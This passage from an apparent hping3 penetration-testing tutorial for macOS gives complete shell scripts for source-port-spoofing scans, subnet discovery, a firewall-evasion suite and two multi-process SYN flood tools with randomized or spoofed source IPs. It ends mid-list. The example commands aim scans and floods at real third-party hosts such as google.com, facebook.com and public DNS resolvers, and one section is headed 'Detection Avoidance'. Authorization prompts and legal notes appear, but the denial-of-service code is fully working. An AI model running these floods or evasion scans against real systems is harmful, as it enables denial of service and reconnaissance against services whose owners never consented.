elif [ "$CLOSED_COUNT" -gt 0 ]; then
    echo -e "${RED}▸ Verdict: Port $DEST_PORT is CLOSED${NC}"
    echo -e "${CYAN}  Note: Port responded normally regardless of source port${NC}"
else
    echo -e "${YELLOW}▸ Verdict: Port $DEST_PORT is FILTERED${NC}"
    echo -e "${CYAN}  Note: Source port $SOURCE_PORT did not bypass filtering${NC}"
    echo -e "${CYAN}  The firewall is properly configured against source port spoofing${NC}"
fi

echo ""
echo -e "${BLUE}Results Summary:${NC}"
echo -e "  Open responses: $OPEN_COUNT"
echo -e "  Closed responses: $CLOSED_COUNT"
echo -e "  Filtered/No response: $FILTERED_COUNT"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

echo ""
echo -e "${YELLOW}Security Notes:${NC}"
echo -e "${CYAN}• Source port spoofing tests firewall trust relationships${NC}"
echo -e "${CYAN}• Some older firewalls trust traffic from DNS (53) or FTP-DATA (20)${NC}"
echo -e "${CYAN}• Modern firewalls should not trust source ports alone${NC}"
echo -e "${CYAN}• This technique is often combined with other evasion methods${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./source_port_scan.sh

How to Run:

# Basic Examples
./source_port_scan.sh google.com                      # Default: port 80, source port 53 (DNS), 1 packet
./source_port_scan.sh github.com 443                  # Scan HTTPS port with DNS source port
./source_port_scan.sh example.com 80 20               # Use FTP-DATA source port (20)
./source_port_scan.sh cloudflare.com 443 53 5         # Send 5 packets for reliability

# Advanced Examples
./source_port_scan.sh 192.168.1.1 22 123 3           # SSH scan with NTP source port
./source_port_scan.sh internalserver.local 3306 68 2  # MySQL scan with DHCP client port
./source_port_scan.sh api.example.com 8080 1337 3     # Custom source port 1337

# Testing Web Servers
./source_port_scan.sh mywebsite.com 80 53 3          # HTTP with DNS source
./source_port_scan.sh mywebsite.com 443 53 3         # HTTPS with DNS source

# Testing Multiple Trusted Ports on Same Target
./source_port_scan.sh target.com 80 53 2             # DNS source port
./source_port_scan.sh target.com 80 20 2             # FTP-DATA source port
./source_port_scan.sh target.com 80 123 2            # NTP source port
./source_port_scan.sh target.com 80 67 2             # DHCP source port

# Internal Network Testing
./source_port_scan.sh 10.0.1.100 445 53 3            # SMB with DNS source
./source_port_scan.sh 10.0.1.100 3389 53 3           # RDP with DNS source

# Testing Popular Services
./source_port_scan.sh google.com 80 53 2             # Google HTTP
./source_port_scan.sh facebook.com 443 53 2          # Facebook HTTPS
./source_port_scan.sh amazon.com 443 20 2            # Amazon with FTP-DATA source

# Testing DNS Servers
./source_port_scan.sh 8.8.8.8 53 123 2               # Google DNS with NTP source
./source_port_scan.sh 1.1.1.1 53 20 2                # Cloudflare DNS with FTP-DATA source

# Help Command
./source_port_scan.sh --help                         # Show usage information
./source_port_scan.sh -h                             # Alternative help flag

Common Trusted Source Ports:
– **53**: DNS – Often allowed through firewalls
– **20**: FTP-DATA – May be trusted for FTP connections
– **123**: NTP – Network Time Protocol, often allowed
– **67/68**: DHCP – Dynamic Host Configuration Protocol

Script 8: SYN Flood Attack (Multi-Process with Source IP Decoy)

Purpose:
Performs multi-process SYN flood attacks for authorized DoS testing. This script can cause significant load – especially when used with decoy options.

Create the Script:

cat > ./syn_flood_attack.sh << 'EOF'
#!/bin/zsh

# Function to generate a random IP from a CIDR block
generate_random_ip_from_cidr() {
    local cidr=$1
    local ip_base=${cidr%/*}
    local cidr_bits=${cidr#*/}
    
    # Convert IP to integer
    local ip_parts=(${(s:.:)ip_base})
    local ip_int=$(( (ip_parts[1] << 24) + (ip_parts[2] << 16) + (ip_parts[3] << 8) + ip_parts[4] ))
    
    # Calculate host bits and range
    local host_bits=$((32 - cidr_bits))
    local max_hosts=$((2 ** host_bits - 1))
    
    # Generate random offset within the range
    local random_offset=$((RANDOM % (max_hosts + 1)))
    
    # Add offset to base IP
    local new_ip_int=$((ip_int + random_offset))
    
    # Convert back to IP format
    local octet1=$(( (new_ip_int >> 24) & 255 ))
    local octet2=$(( (new_ip_int >> 16) & 255 ))
    local octet3=$(( (new_ip_int >> 8) & 255 ))
    local octet4=$(( new_ip_int & 255 ))
    
    echo "${octet1}.${octet2}.${octet3}.${octet4}"
}

syn_flood_attack() {
    local target=$1
    local port=$2
    local packet_count=$3
    local processes=$4
    local source_cidr=$5  # Optional CIDR block for source IP randomization
    
    if [ -z "$target" ] || [ -z "$port" ] || [ -z "$packet_count" ] || [ -z "$processes" ]; then
        echo "Usage: syn_flood_attack <target> <port> <packet_count> <processes> [source_cidr]"
        echo "Example: syn_flood_attack example.com 80 1000 4"
        echo "Example with CIDR: syn_flood_attack example.com 80 1000 4 192.168.1.0/24"
        echo ""
        echo "WARNING: This is a DoS attack tool!"
        echo "Only use on systems you own or have explicit permission to test!"
        return 1
    fi
    
    echo "=========================================="
    echo "           SYN FLOOD ATTACK"
    echo "=========================================="
    echo "Target: $target:$port"
    echo "Total packets: $packet_count"
    echo "Processes: $processes"
    echo "Packets per process: $((packet_count / processes))"
    if [ -n "$source_cidr" ]; then
        echo "Source CIDR: $source_cidr"
    else
        echo "Source IPs: Random (--rand-source)"
    fi
    echo ""
    echo "⚠️  WARNING: This will perform a SYN flood attack!"
    echo "⚠️  Only use on systems you own or have explicit permission to test!"
    echo "⚠️  Unauthorized DoS attacks are illegal!"
    echo ""
    echo -n "Do you have authorization to test this target? (type 'YES' to continue): "
    read confirm
    
    if [[ "$confirm" != "YES" ]]; then
        echo "❌ Attack aborted - explicit authorization required"
        return 1
    fi
    
    local packets_per_process=$((packet_count / processes))
    local remaining_packets=$((packet_count % processes))
    
    echo "✅ Starting SYN flood with $processes processes..."
    echo "📊 Monitor system resources during attack"
    
    # Create log directory
    local log_dir="/tmp/syn_flood_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$log_dir"
    
    # Start background processes
    local pids=()
    for ((i=1; i<=processes; i++)); do
        local current_packets=$packets_per_process
        # Add remaining packets to the last process
        if [ $i -eq $processes ]; then
            current_packets=$((packets_per_process + remaining_packets))
        fi
        
        echo "🚀 Starting process $i with $current_packets packets"
        (
            echo "Process $i started at $(date)" > "$log_dir/process_$i.log"
            
            if [ -n "$source_cidr" ]; then
                # Use CIDR block for source IP randomization
                echo "Using source CIDR: $source_cidr" >> "$log_dir/process_$i.log"
                
                # Send packets with randomized source IPs from CIDR block
                # We'll send packets in smaller batches to vary the source IP
                local batch_size=10
                local sent=0
                
                while [ $sent -lt $current_packets ]; do
                    local remaining=$((current_packets - sent))
                    local this_batch=$((remaining < batch_size ? remaining : batch_size))
                    local source_ip=$(generate_random_ip_from_cidr "$source_cidr")
                    
                    hping3 -S -p $port -a $source_ip -c $this_batch --flood $target >> "$log_dir/process_$i.log" 2>&1
                    sent=$((sent + this_batch))
                done
            else
                # Use completely random source IPs
                echo "Using random source IPs" >> "$log_dir/process_$i.log"
                hping3 -S -p $port --rand-source -c $current_packets --flood $target >> "$log_dir/process_$i.log" 2>&1
            fi
            
            echo "Process $i completed at $(date)" >> "$log_dir/process_$i.log"
            echo "✅ Process $i completed ($current_packets packets sent)"
        ) &
        
        pids+=($!)
    done
    
    echo "⏳ Waiting for all processes to complete..."
    echo "💡 You can monitor progress with: tail -f $log_dir/process_*.log"
    
    # Wait for all processes and show progress
    local completed=0
    while [ $completed -lt $processes ]; do
        completed=0
        for pid in "${pids[@]}"; do
            if ! kill -0 $pid 2>/dev/null; then
                ((completed++))
            fi
        done
        
        echo "📈 Progress: $completed/$processes processes completed"
        sleep 2
    done
    
    echo "🎯 SYN flood attack completed!"
    echo "📋 Logs saved in: $log_dir"
    echo "🧹 Clean up logs with: rm -rf $log_dir"
}

# Check if script is being sourced or executed directly
if [[ "${(%):-%x}" == "${0}" ]]; then
    syn_flood_attack "$@"
fi
EOF

chmod +x ./syn_flood_attack.sh

How to Run:

# Basic Usage Syntax:
./syn_flood_attack.sh <target> <port> <packet_count> <processes>

# 1. Test against a local test server (SAFE)
# Send 1000 SYN packets to localhost port 8080 using 4 parallel processes
./syn_flood_attack.sh localhost 8080 1000 4

# 2. Test your own web server
# Send 5000 packets to your own server on port 80 using 10 processes
./syn_flood_attack.sh your-test-server.com 80 5000 10

# 3. Small-scale test
# Send only 100 packets using 2 processes for minimal testing
./syn_flood_attack.sh 127.0.0.1 3000 100 2

# 4. Stress test with more packets
# Send 10000 packets to port 443 using 20 parallel processes
./syn_flood_attack.sh test.example.local 443 10000 20

# 5. Create a random decoy attack using ip addresses from a specified CIDR block. This has the highest potential to cause harm. Authorised use only!
./syn_flood_attack.sh target.com 80 1000 4 192.168.0.0/16
./syn_flood_attack.sh target.com 80 1000 4 10.0.0.0/8

# Parameters:
# <target>: IP address or hostname (localhost, 192.168.1.100, test-server.local)
# <port>: Target port number (80 for HTTP, 443 for HTTPS, 22 for SSH)
# <packet_count>: Total number of SYN packets to send (1000, 5000, etc.)
# <processes>: Number of parallel hping3 processes to use (4, 10, etc.)

Example Output:

 ./syn_flood_attack.sh localhost 8080 1000 4

==========================================
           SYN FLOOD ATTACK
==========================================
Target: localhost:8080
Total packets: 1000
Processes: 4
Packets per process: 250

⚠️  WARNING: This will perform a SYN flood attack!
⚠️  Only use on systems you own or have explicit permission to test!
⚠️  Unauthorized DoS attacks are illegal!

Do you have authorization to test this target? (type 'YES' to continue): YES
✅ Starting SYN flood with 4 processes...
📊 Monitor system resources during attack
🚀 Starting process 1 with 250 packets
🚀 Starting process 2 with 250 packets
🚀 Starting process 3 with 250 packets
🚀 Starting process 4 with 250 packets
⏳ Waiting for all processes to complete...
💡 You can monitor progress with: tail -f /tmp/syn_flood_20250923_114710/process_*.log

Safety Features:
– Explicit authorization confirmation required
– Process monitoring and logging
– Progress tracking with visual indicators
– Automatic log cleanup instructions

Parameters Explained:
**target**: Target hostname/IP address
**port**: Target port number
**packet_count**: Total packets to send
**processes**: Number of parallel processes

Script 9: Comprehensive Network Discovery

Purpose:
Performs comprehensive network discovery combining ICMP and TCP techniques to map active hosts and services across a network range.

Create the Script:

cat > ./network_discovery.sh << 'EOF'
#!/bin/zsh

network_discovery() {
    local network=$1
    local start_ip=${2:-1}
    local end_ip=${3:-254}
    local test_ports=${4:-"22,80,443"}
    
    if [ -z "$network" ]; then
        echo "Usage: network_discovery <network> [start_ip] [end_ip] [test_ports]"
        echo "Example: network_discovery 192.168.1 1 100 '22,80,443,8080'"
        return 1
    fi
    
    echo "🔍 Comprehensive Network Discovery"
    echo "=================================="
    echo "Network: $network.$start_ip-$end_ip"
    echo "Test ports: $test_ports"
    echo ""
    
    # Create results directory
    local results_dir="/tmp/network_discovery_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$results_dir"
    
    # Phase 1: ICMP Discovery
    echo "📡 Phase 1: ICMP Host Discovery"
    echo "==============================="
    local icmp_results="$results_dir/icmp_results.txt"
    
    for i in $(seq $start_ip $end_ip); do
        (hping3 -1 -c 1 $network.$i 2>&1 | grep -E "(bytes from|icmp.*seq=)" && echo "$network.$i" >> "$icmp_results") &
        
        # Limit concurrent processes on macOS
        if (( i % 20 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$icmp_results" ]; then
        echo "✅ ICMP-responsive hosts:"
        cat "$icmp_results" | while read host; do
            echo "  - $host [ICMP]"
        done
    else
        echo "❌ No ICMP-responsive hosts found"
    fi
    
    echo ""
    
    # Phase 2: TCP Discovery
    echo "🚪 Phase 2: TCP Port Discovery"
    echo "=============================="
    local tcp_results="$results_dir/tcp_results.txt"
    
    # Zsh-compatible array splitting
    PORT_ARRAY=(${(s:,:)test_ports})
    
    for i in $(seq $start_ip $end_ip); do
        for port in "${PORT_ARRAY[@]}"; do
            (hping3 -S -p $port -c 1 $network.$i 2>&1 | grep "flags=SA" && echo "$network.$i:$port" >> "$tcp_results") &
        done
        
        # Limit concurrent processes
        if (( i % 10 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$tcp_results" ]; then
        echo "✅ TCP-responsive hosts and ports:"
        cat "$tcp_results" | while read host_port; do
            echo "  - $host_port [TCP]"
        done
    else
        echo "❌ No TCP-responsive hosts found"
    fi
    
    echo ""
    echo "📊 Discovery Summary"
    echo "==================="
    echo "Results saved in: $results_dir"
    echo "ICMP hosts: $([ -s "$icmp_results" ] && wc -l < "$icmp_results" || echo 0)"
    echo "TCP services: $([ -s "$tcp_results" ] && wc -l < "$tcp_results" || echo 0)"
    echo ""
    echo "🧹 Clean up with: rm -rf $results_dir"
}

# Zsh-compatible check for direct execution
if [[ "${(%):-%N}" == "${0}" ]] || [[ "$ZSH_EVAL_CONTEXT" == "toplevel" ]]; then
    network_discovery "$@"
fi
EOF

chmod +x ./network_discovery.sh

How to Run:

# Basic Usage - Scan entire subnet with default ports (22,80,443)
./network_discovery.sh 192.168.1

# Scan specific IP across a port range
./network_discovery.sh 192.168.1 1 50

# Scan specific IP using a custom port list
./network_discovery.sh 192.168.1 1 100 '22,80,443,8080,3306'

# Home Network Scans
./network_discovery.sh 192.168.1 1 20 '80,443'                    # Router and devices
./network_discovery.sh 192.168.0 1 30 '22,80,443,8080'           # Alternative subnet
./network_discovery.sh 10.0.0 1 50 '22,80,443,3389,445'          # Corporate network range

# Service-Specific Discovery
./network_discovery.sh 192.168.1 1 254 '80,443,8080,8443'        # Web servers only
./network_discovery.sh 192.168.1 1 100 '22'                       # SSH servers only
./network_discovery.sh 10.0.0 1 50 '3306,5432,27017,6379'        # Database servers
./network_discovery.sh 192.168.1 1 100 '445,3389,139'            # Windows machines
./network_discovery.sh 192.168.1 1 50 '3000,5000,8000,9000'      # Dev servers

# Quick Targeted Scans
./network_discovery.sh 192.168.1 1 10                             # First 10 IPs, default ports
./network_discovery.sh 192.168.1 100 100 '21,22,23,25,80,110,443,445,3306,3389,5900,8080'  # Single host, many ports
./network_discovery.sh 172.16.0 1 30 '80,443'                    # Fast web discovery

# Your Local Network (based on your IP: 10.223.23.133)
./network_discovery.sh 10.223.23 130 140 '22,80,443'             # Scan near your IP
./network_discovery.sh 10.223.23 1 254 '80,443'                  # Full subnet web scan
./network_discovery.sh 10.223.23 133 133 '1-65535'               # Scan all ports on your IP

# Localhost Testing
./network_discovery.sh 127.0.0 1 1 '22,80,443,3000,8080'         # Test on localhost

# Advanced Usage with sudo (for better ICMP results)
sudo ./network_discovery.sh 192.168.1 1 50
sudo ./network_discovery.sh 10.223.23 130 140 '22,80,443,8080'

# Comprehensive port scan
./network_discovery.sh 192.168.1 1 20 '21,22,23,25,53,80,110,143,443,445,993,995,1433,3306,3389,5432,5900,6379,8080,8443,27017'

# Chain with other commands
./network_discovery.sh 192.168.1 1 10 && echo "Scan complete"
./network_discovery.sh 192.168.1 1 20 '22' | tee scan_results.txt

# View and manage results
ls -la /tmp/network_discovery_*                                   # List all scan results
cat /tmp/network_discovery_*/icmp_results.txt                     # View ICMP results
cat /tmp/network_discovery_*/tcp_results.txt                      # View TCP results
rm -rf /tmp/network_discovery_*                                   # Clean up all results

### LOCAL MACHINE EXAMPLE
# Targeting your local machine and common services. Let me first check what services are running on your machine:
netstat -an | grep LISTEN | grep -E '\.([0-9]+)\s' | awk '{print $4}' | sed 's/.*\.//' | sort -u | head -20
18313
5000
53
55296
61611
65535
7000
9000
9010
9277

### Check your actual IP address to create working examples:
ifconfig | grep "inet " | grep -v 127.0.0.1 | awk '{print $2}' | head -1
10.223.23.133
### Now let's test with your actual IP and the ports that are listening. Note that hping3 often needs sudo privileges for proper ICMP and TCP SYN scanning:
sudo ./network_discovery.sh 10.223.23 133 133 '5000,7000,9000,9010,53'


### EXAMPLES THAT WILL RETURN SUCCESSFUL RESULTS

# 1. Scan Google's servers (known to respond)
sudo ./network_discovery.sh 142.251.216 78 78 '80,443'
sudo ./network_discovery.sh 142.251.216 1 10 '80,443'

# 2. Scan Cloudflare DNS (highly available)
sudo ./network_discovery.sh 1.1.1 1 1 '53,80,443'
sudo ./network_discovery.sh 1.0.0 1 1 '53,80,443'

# 3. Scan popular DNS servers
sudo ./network_discovery.sh 8.8.8 8 8 '53,443'              # Google DNS
sudo ./network_discovery.sh 8.8.4 4 4 '53,443'              # Google DNS secondary
sudo ./network_discovery.sh 208.67.222 222 222 '53,443'     # OpenDNS

# 4. Scan your local gateway (should respond on some ports)
sudo ./network_discovery.sh 10.223.22 1 1 '80,443,22,53,8080'

# 5. Scan your local subnet for common services
sudo ./network_discovery.sh 10.223.23 1 10 '22,80,443,445,3389,5900'
sudo ./network_discovery.sh 10.223.23 130 140 '80,443,22,3389'

# 6. Quick test with well-known servers
sudo ./network_discovery.sh 93.184.216 34 34 '80,443'      # example.com
sudo ./network_discovery.sh 104.17.113 106 106 '80,443'    # Cloudflare IP

# 7. Scan for web servers in your network
sudo ./network_discovery.sh 10.223.23 1 254 '80,443'

# 8. Multiple reliable targets in one scan
sudo ./network_discovery.sh 1.1.1 1 2 '53,80,443'          # Cloudflare DNS range

# 9. Test against localhost services (based on your running ports)
sudo ./network_discovery.sh 127.0.0 1 1 '5000,7000,9000,9010,53'

# 10. Comprehensive scan of known responsive range
sudo ./network_discovery.sh 142.251.216 70 80 '80,443,22'

Parameters Explained:
**network** (required): Network base (e.g., “192.168.1”)
**start_ip** (optional, default: 1): Starting host number
**end_ip** (optional, default: 254): Ending host number
**test_ports** (optional, default: “22,80,443”): Comma-separated port list

Discovery Phases:
1. **ICMP Discovery**: Tests basic connectivity with ping
2. **TCP Discovery**: Tests specific services on each host
3. **Results Analysis**: Provides comprehensive summary

Script 10: Firewall Evasion Test Suite

Purpose:
Performs a comprehensive battery of firewall evasion techniques to test security controls and identify potential bypass methods.

Create the Script:

cat > ./firewall_evasion_test.sh << 'EOF'
#!/bin/zsh

firewall_evasion_test() {
    local target=$1
    local port=${2:-80}
    
    if [ -z "$target" ]; then
        echo "Usage: firewall_evasion_test  [port]"
        echo "Example: firewall_evasion_test example.com 443"
        return 1
    fi
    
    echo "🛡️ Comprehensive Firewall Evasion Test Suite"
    echo "============================================="
    echo "Target: $target:$port"
    echo "Testing multiple evasion techniques..."
    echo ""
    
    # Test 1: Normal SYN scan (baseline)
    echo "🔍 Test 1: Normal SYN Scan (Baseline)"
    echo "====================================="
    result1=$(hping3 -S -p $port -c 1 $target 2>&1)
    echo "$result1"
    if echo "$result1" | grep -q "flags=SA"; then
        echo "✅ BASELINE: Port appears OPEN"
    else
        echo "❌ BASELINE: Port appears CLOSED/FILTERED"
    fi
    echo ""
    
    # Test 2: Source port 53 (DNS)
    echo "🔍 Test 2: DNS Source Port Spoofing (53)"
    echo "========================================"
    result2=$(hping3 -S -p $port -s 53 -c 1 $target 2>&1)
    echo "$result2"
    if echo "$result2" | grep -q "flags=SA"; then
        echo "✅ DNS SPOOF: Bypass successful!"
    else
        echo "❌ DNS SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 3: Source port 20 (FTP-DATA)
    echo "🔍 Test 3: FTP-DATA Source Port Spoofing (20)"
    echo "=============================================="
    result3=$(hping3 -S -p $port -s 20 -c 1 $target 2>&1)
    echo "$result3"
    if echo "$result3" | grep -q "flags=SA"; then
        echo "✅ FTP SPOOF: Bypass successful!"
    else
        echo "❌ FTP SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 4: Fragmented packets
    echo "🔍 Test 4: Packet Fragmentation"
    echo "==============================="
    result4=$(hping3 -S -p $port -f -c 1 $target 2>&1)
    echo "$result4"
    if echo "$result4" | grep -q "flags=SA"; then
        echo "✅ FRAGMENTATION: Bypass successful!"
    else
        echo "❌ FRAGMENTATION: No bypass detected"
    fi
    echo ""
    
    # Test 5: FIN scan
    echo "🔍 Test 5: FIN Scan Evasion"
    echo "==========================="
    result5=$(hping3 -F -p $port -c 1 $target 2>&1)
    echo "$result5"
    if ! echo "$result5" | grep -q "flags=R" && ! echo "$result5" | grep -q "ICMP"; then
        echo "✅ FIN SCAN: Potential bypass (no response)"
    else
        echo "❌ FIN SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 6: NULL scan
    echo "🔍 Test 6: NULL Scan Evasion"
    echo "============================"
    result6=$(hping3 -p $port -c 1 $target 2>&1)
    echo "$result6"
    if ! echo "$result6" | grep -q "flags=R" && ! echo "$result6" | grep -q "ICMP"; then
        echo "✅ NULL SCAN: Potential bypass (no response)"
    else
        echo "❌ NULL SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 7: XMAS scan
    echo "🔍 Test 7: XMAS Scan Evasion"
    echo "============================"
    result7=$(hping3 -F -P -U -p $port -c 1 $target 2>&1)
    echo "$result7"
    if ! echo "$result7" | grep -q "flags=R" && ! echo "$result7" | grep -q "ICMP"; then
        echo "✅ XMAS SCAN: Potential bypass (no response)"
    else
        echo "❌ XMAS SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 8: Random source addresses
    echo "🔍 Test 8: Random Source Address"
    echo "================================"
    result8=$(hping3 -S -p $port --rand-source -c 3 $target 2>&1)
    echo "$result8"
    if echo "$result8" | grep -q "flags=SA"; then
        echo "✅ RANDOM SOURCE: Bypass successful!"
    else
        echo "❌ RANDOM SOURCE: No bypass detected"
    fi
    echo ""
    
    # Summary
    echo "📊 Evasion Test Summary"
    echo "======================="
    echo "Target: $target:$port"
    echo "Tests completed: 8"
    echo ""
    echo "Potential bypasses detected:"
    [[ "$result2" =~ "flags=SA" ]] && echo "  ✅ DNS source port spoofing"
    [[ "$result3" =~ "flags=SA" ]] && echo "  ✅ FTP-DATA source port spoofing"
    [[ "$result4" =~ "flags=SA" ]] && echo "  ✅ Packet fragmentation"
    [[ ! "$result5" =~ "flags=R" && ! "$result5" =~ "ICMP" ]] && echo "  ✅ FIN scan stealth"
    [[ ! "$result6" =~ "flags=R" && ! "$result6" =~ "ICMP" ]] && echo "  ✅ NULL scan stealth"
    [[ ! "$result7" =~ "flags=R" && ! "$result7" =~ "ICMP" ]] && echo "  ✅ XMAS scan stealth"
    [[ "$result8" =~ "flags=SA" ]] && echo "  ✅ Random source addressing"
    
    echo ""
    echo "🔒 Recommendations:"
    echo "  - Review firewall rules for source port filtering"
    echo "  - Enable stateful packet inspection"
    echo "  - Configure fragment reassembly"
    echo "  - Monitor for stealth scan patterns"
}

if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
    firewall_evasion_test "$@"
fi
EOF

chmod +x ./firewall_evasion_test.sh

How to Run:


# Test firewall evasion on port 80
sudo ./firewall_evasion_test.sh example.com

# Test firewall evasion on HTTPS port
sudo ./firewall_evasion_test.sh example.com 443

Evasion Techniques Tested:
1. **Baseline SYN scan**: Normal connection attempt
2. **DNS source port spoofing**: Uses port 53 as source
3. **FTP-DATA source port spoofing**: Uses port 20 as source
4. **Packet fragmentation**: Splits packets to evade inspection
5. **FIN scan**: Uses FIN flag for stealth
6. **NULL scan**: No flags set for evasion
7. **XMAS scan**: Multiple flags for confusion
8. **Random source addressing**: Obscures attack origin

Important Usage Notes:

macOS-Specific Considerations:
– **Root privileges required**: Most scripts need `sudo` for raw socket access
– **Process limits**: macOS limits concurrent processes, scripts include throttling
– **Firewall interference**: macOS firewall may block outgoing packets
– **Network interfaces**: Scripts auto-detect primary interface

Performance Optimization:
– Use appropriate delays to avoid overwhelming targets
– Limit concurrent processes on macOS (typically 20-50)
– Monitor system resources during intensive scans
– Use temporary files for result collection

Detection Avoidance:

# Slow scanning to avoid detection
sudo ./tcp_syn_scan.sh example.com 1 100 5

# Random timing patterns
sudo ./source_port_scan.sh example.com 80 53 1

Integration with Other Tools:

# Combine with nmap for verification
sudo ./common_ports_scan.sh example.com
nmap -sS example.com

# Use with tcpdump for packet analysis
sudo tcpdump -i en0 host example.com &
sudo ./tcp_syn_ping.sh example.com

# Solution: Use sudo for raw socket access
sudo ./script_name.sh

Command Not Found:


# Solution: Verify hping3 installation
brew install hping
which hping3

Network Interface Issues:


# Solution: Specify interface manually
hping3 -I en0 -S -p 80 example.com

Script Debugging:


# Enable verbose output
set -x
source ./script_name.sh

# Check script syntax
zsh -n ./script_name.sh

Legal and Ethical Guidelines:

Before You Begin:
– ✅ Obtain written authorization from system owners
– ✅ Define clear scope and boundaries
– ✅ Establish communication channels
– ✅ Plan for incident response
– ✅ Document all activities

During Testing:
– 🔍 Monitor system impact continuously
– ⏸️ Stop immediately if unauthorized access is gained
– 📝 Document all findings and methods
– 🚫 Do not access or modify data
– ⚠️ Report critical vulnerabilities promptly

After Testing:
– 📋 Provide comprehensive reports
– 🗑️ Securely delete all collected data
– 🤝 Follow responsible disclosure practices
– 📚 Share lessons learned (with permission)

Conclusion

This comprehensive hping3 guide provides 10 essential penetration testing scripts specifically optimized for macOS systems. Each script includes detailed explanations, parameter descriptions, and practical examples using example.com as the target.

Key Takeaways:
– **Authorization is mandatory** – Never test without explicit permission
– **macOS optimization** – Scripts include platform-specific considerations
– **Comprehensive coverage** – From basic discovery to advanced evasion
– **Safety features** – Built-in protections and confirmation prompts
– **Educational value** – Detailed explanations for learning

Next Steps:
1. Set up your macOS environment with the installation steps
2. Create the script directory and download the scripts
3. Practice on authorized targets or lab environments
4. Integrate with other security tools for comprehensive testing
5. Develop your own custom scripts based on these examples

Remember: These tools are powerful and should be used responsibly. Always prioritize ethical considerations and legal compliance in your security testing activities.

Official Documentation:
– [hping3 Official Website](http://www.hping.org/)
– [hping3 Manual Page](https://linux.die.net/man/8/hping3)

Related Tools:
– **nmap**: Network discovery and port scanning
– **masscan**: High-speed port scanner
– **zmap**: Internet-wide network scanner
– **tcpdump**: Packet capture and analysis

Learning Resources:
– OWASP Testing Guide
– NIST Cybersecurity Framework
– CEH (Certified Ethical Hacker) materials
– OSCP (Offensive Security Certified Professional) training

Script Summary Table:

| Script | Purpose | Key Features |
|——–|———|————–|
| `icmp_ping.sh` | Basic host discovery | ICMP connectivity testing |
| `icmp_sweep.sh` | Network enumeration | Bulk host discovery |
| `tcp_syn_ping.sh` | Firewall-resistant discovery | TCP-based host detection |
| `tcp_syn_scan.sh` | Port scanning | Stealth SYN scanning |
| `common_ports_scan.sh` | Service discovery | Predefined port lists |
| `fin_scan.sh` | Stealth scanning | FIN flag evasion |
| `source_port_scan.sh` | Firewall bypass | Source port spoofing |
| `syn_flood_attack.sh` | DoS testing | Multi-process flooding |
| `network_discovery.sh` | Comprehensive recon | Combined techniques |
| `firewall_evasion_test.sh` | Security testing | Multiple evasion methods |

This guide provides everything needed to perform professional-grade penetration testing with hping3 on macOS systems while maintaining ethical and legal standards.

Testing your sites SYN flood resistance using hping3 in parallel

A SYN flood test using hping3 that allows you to specify the number of SYN packets to send and scales horizontally with a specific number of processes can be created using a Bash script with the xargs command. This approach allows you to distribute the workload across multiple processes for better performance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true

# Test without IP randomization (easier to trace/debug)
